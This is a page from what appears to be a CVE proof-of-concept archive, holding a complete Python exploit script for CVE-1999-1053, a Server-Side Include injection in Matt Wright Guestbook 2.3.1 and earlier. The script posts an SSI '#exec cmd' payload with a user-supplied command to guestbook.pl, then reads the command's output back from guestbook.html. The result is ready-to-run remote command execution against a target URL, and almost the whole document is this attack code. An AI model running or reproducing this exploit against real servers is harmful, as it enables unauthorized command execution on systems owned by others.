4837 Total CVEs
26 Years
GitHub
Home / 1999 / CVE-1999-1053
README.md
Rendering markdown...
POC / CVE-1999-1053-PoC.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3

import requests
import string
import random
import argparse
from bs4 import BeautifulSoup
from colorama import Fore, init

def banner():
	print(f'+{"-" * 15}Banner{"-" * 15}+')
	print(Fore.YELLOW + '''Author: siunam (https://siunam321.github.io/)
Original author: Patrick
Original Exploit-DB exploit script: https://www.exploit-db.com/exploits/9907
CVE ID: CVE-1999-1053
Description: CVE-1999-1053 Server-Side Include injection vulnerability in Matt Wright Guestbook <= 2.3.1''')
	print(f'+{"-" * 15}Banner{"-" * 15}+')

def main(url, payload):
	# Server-Side Include exec payload
	ssi_exec = '<!--#exec cmd='

	data = {
	# 'realname', 'username', 'url', 'city', 'state' form field can be random
	'realname': ''.join(random.choices(string.ascii_letters, k=20)),
	'username': ''.join(random.choices(string.ascii_letters, k=20)),
	'url': ''.join(random.choices(string.ascii_letters, k=20)),
	'city': ''.join(random.choices(string.ascii_letters, k=20)),
	'state': ''.join(random.choices(string.ascii_letters, k=20)),

	# Make sure the 'country' POST data has a HTML closing comment to close the SSI payload
	'country': '-->',
	'comments': f'''{ssi_exec}"{payload}"'''
}

	# Try to send the payload
	try:
		print(f'[+] Sending the payload: {payload}')
		requests.post(url + '/cgi-bin/guestbook.pl', data=data)
	except:
		print('[-] Unable to send the payload...')
		print('[-] Maybe the target doesn\'t enable guestbook.pl script and Server-Side Include (SSI) script handler enabled for the .html file type??')

	# Try to trigger the payload
	try:
		print(f'[+] Triggering the payload...')
		get_req = requests.get(url + '/guestbook.html')
		soup = BeautifulSoup(get_req.text, 'html.parser')
		
		# Find the latest comment in the guestbook, which is the payload output
		print('[+] The output on the guestbook:')
		print(f'+{"-" * 15}Output{"-" * 15}+')

		# Find the first <b> tag text, and split the UTC date
		result = soup.find('b').getText().split(' - ')
		print(Fore.RED + result[0].strip())
		print(f'+{"-" * 15}Output{"-" * 15}+')
	except:
		print('[-] Unable to trigger the payload...')

if __name__ == '__main__':
	# Parsing arguments
	parser = argparse.ArgumentParser(description='A Proof-of-Concept(PoC) Python3 script to exploit CVE-1999-1053 Server-Side Include injection vulnerability in Matt Wright Guestbook <= 2.3.1')
	parser.add_argument('-u', '--url', type=str, required=True, help='Target full URL. E.g: http://domain.here/')
	parser.add_argument('-p', '--payload', type=str, required=True, help='Payload. Default SSI payload: <!--#exec cmd="<payload_here>"')
	args = parser.parse_args()

	# Set colorama to auto reset color
	init(autoreset=True)

	banner()

	# Exploit function
	main(args.url, args.payload)